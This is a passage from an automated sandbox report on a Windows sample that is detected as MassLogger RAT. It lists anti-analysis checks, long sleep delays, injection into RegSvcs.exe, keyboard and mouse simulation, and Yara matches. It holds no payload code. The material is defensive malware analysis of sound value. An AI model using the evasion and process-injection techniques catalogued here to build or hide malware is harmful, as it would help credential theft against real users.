              Source: C:\Users\user\Desktop\njVvgA8pEB.exeAPI/Special instruction interceptor: Address: 16BEF5C
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: njVvgA8pEB.exe, 00000000.00000002.1722942325.0000000001210000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1712410523.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1712523859.0000000001210000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1722715485.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1722581179.0000000001563000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000002.1740455255.00000000015CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599739Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599553Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596783Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596487Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593992Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593867Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593756Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2180Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7635Jump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101613
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeAPI coverage: 4.5 %
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037445A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037C6D1 FindFirstFileW,FindClose,0_2_0037C6D1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0037C75C
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037EF95
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F0F2
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037F3F3
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003737EF
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00373B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373B12
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037BCBC
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003149A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599739Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599553Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596783Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596487Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593992Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593867Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593756Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593516Jump to behavior
              Source: RegSvcs.exe, 00000003.00000002.4185989796.0000000001230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeAPI call chain: ExitProcess graph end nodegraph_0-100425
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00383F09 BlockInput,0_2_00383F09
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00313B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00313B3A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00345A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00345A7C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00314B37 LoadLibraryA,GetProcAddress,0_2_00314B37
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_012F9020 mov eax, dword ptr fs:[00000030h]0_2_012F9020
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_012FA630 mov eax, dword ptr fs:[00000030h]0_2_012FA630
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_012FA690 mov eax, dword ptr fs:[00000030h]0_2_012FA690
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 2_2_016BF1C8 mov eax, dword ptr fs:[00000030h]2_2_016BF1C8
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 2_2_016BF228 mov eax, dword ptr fs:[00000030h]2_2_016BF228
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 2_2_016BDBB8 mov eax, dword ptr fs:[00000030h]2_2_016BDBB8
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003680A9
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033A124 SetUnhandledExceptionFilter,0_2_0033A124
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0033A155
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C35008Jump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003687B1 LogonUserW,0_2_003687B1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00313B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00313B3A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003148D7
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00374C27 mouse_event,0_2_00374C27
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00367CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00367CAF
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0036874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0036874B
              Source: njVvgA8pEB.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: njVvgA8pEB.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033862B cpuid 0_2_0033862B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,3_2_00417A20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00344E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00344E87
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00351E06 GetUserNameW,0_2_00351E06
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00343F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00343F3A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003149A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: njVvgA8pEB.exe, 00000000.00000002.1722942325.0000000001210000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1712410523.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1712523859.0000000001210000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1722715485.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1722581179.0000000001563000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000002.1740455255.00000000015CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

              Stealing of Sensitive Information

              barindex
              Yara detected MassLogger RAT
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
